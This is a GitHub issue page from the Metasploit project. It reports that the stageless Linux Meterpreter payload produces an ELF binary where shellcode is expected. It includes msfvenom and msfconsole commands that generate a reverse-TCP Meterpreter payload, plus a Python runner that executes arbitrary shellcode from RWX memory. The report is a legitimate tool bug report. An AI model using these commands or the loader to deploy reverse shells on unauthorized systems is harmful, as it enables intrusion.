Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Linux stageless Metereter is not shellcode #19670

Open
zeroSteiner opened this issue Nov 21, 2024 · 1 comment
Open

Linux stageless Metereter is not shellcode #19670

zeroSteiner opened this issue Nov 21, 2024 · 1 comment
Assignees
Labels
bug not-stale Label to stop an issue from being auto closed

Comments

@zeroSteiner
Copy link
Contributor

The stageless Linux Meterpreter (mettle) is not able to generate shellcode. If you try to do it in msfvenom you'll get an error preventing you from doing that. This same restriction however is not present for modules, or if you try to generate the payload using the payload module from Metasploit.

msfvenom throws an error:

bundle exec ./msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=102.168.159.128 R > /tmp/meterpreter_stageless.bin
Overriding user environment variable 'OPENSSL_CONF' to enable legacy functions.
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Error: selected payload can only generate ELF file

msfconsole generates invalid shellcode:

metasploit-framework.pr (S:0 J:1) payload(linux/x64/meterpreter/reverse_tcp) > use payload/linux/x64/meterpreter_reverse_tcp
metasploit-framework.pr (S:0 J:1) payload(linux/x64/meterpreter_reverse_tcp) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
metasploit-framework.pr (S:0 J:1) payload(linux/x64/meterpreter_reverse_tcp) > generate -f raw -o /tmp/meterpreter_stageless.bin
[*] Writing 1068952 bytes to /tmp/meterpreter_stageless.bin...
metasploit-framework.pr (S:0 J:1) payload(linux/x64/meterpreter_reverse_tcp) > file /tmp/meterpreter_stageless.bin
[*] exec: file /tmp/meterpreter_stageless.bin

/tmp/meterpreter_stageless.bin: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), static-pie linked, with debug_info, not stripped
metasploit-framework.pr (S:0 J:1) payload(linux/x64/meterpreter_reverse_tcp) > 

I'm also pretty confident that if we hypothetically had an exploit that could fit the amount of code necessary for the stageless payload (4MiB or more) that the exploit would be given an incompatible payload using payload.encoded since it's not shellcode. This issue should be resolved by generating shellcode for stageless Meterpreters. As a condition of success, both of the commands above should generate a functional payload instead of msfvenom failing and msfconsole generating something that's wrong.

This Python runner can be given Linux shellcode in a file and it'll execute it. Right now it can be used to show that staged payloads work just fine, but if a stageless Linux payload is used (generated through msfconsole not msfvenom), it'll crash with a segfault.

#!/bin/python
import sys
import mmap
import ctypes
import argparse

def align_up(number, alignment=mmap.PAGESIZE):
    if (number % alignment):
        return number + (alignment - (number % alignment))
    else:
        return number

def execute(shellcode):
    mm = mmap.mmap(
        -1,
        align_up(len(shellcode)),
        mmap.MAP_SHARED,
        mmap.PROT_READ | mmap.PROT_WRITE | mmap.PROT_EXEC,
    )
    print("[+] Writing shellcode to memory...")
    mm.write(shellcode)

    ptr = int.from_bytes(ctypes.string_at(id(mm) + 16, 8), "little")

    functype = ctypes.CFUNCTYPE(ctypes.c_void_p)
    fn = functype(ptr)
    fn()


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Python Shellcode Runner")
    parser.add_argument('shellcode_file', type=argparse.FileType('rb'), help="the shellcode file")
    args = parser.parse_args()

    shellcode = args.shellcode_file.read()
    execute(shellcode)
Copy link

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here.
If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

@github-actions github-actions bot added the Stale Marks an issue as stale, to be closed if no action is taken label Dec 27, 2024
@smcintyre-r7 smcintyre-r7 added the not-stale Label to stop an issue from being auto closed label Jan 6, 2025
@github-actions github-actions bot removed the Stale Marks an issue as stale, to be closed if no action is taken label Jan 6, 2025
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
bug not-stale Label to stop an issue from being auto closed
Projects
Status: Todo
Development

No branches or pull requests

3 participants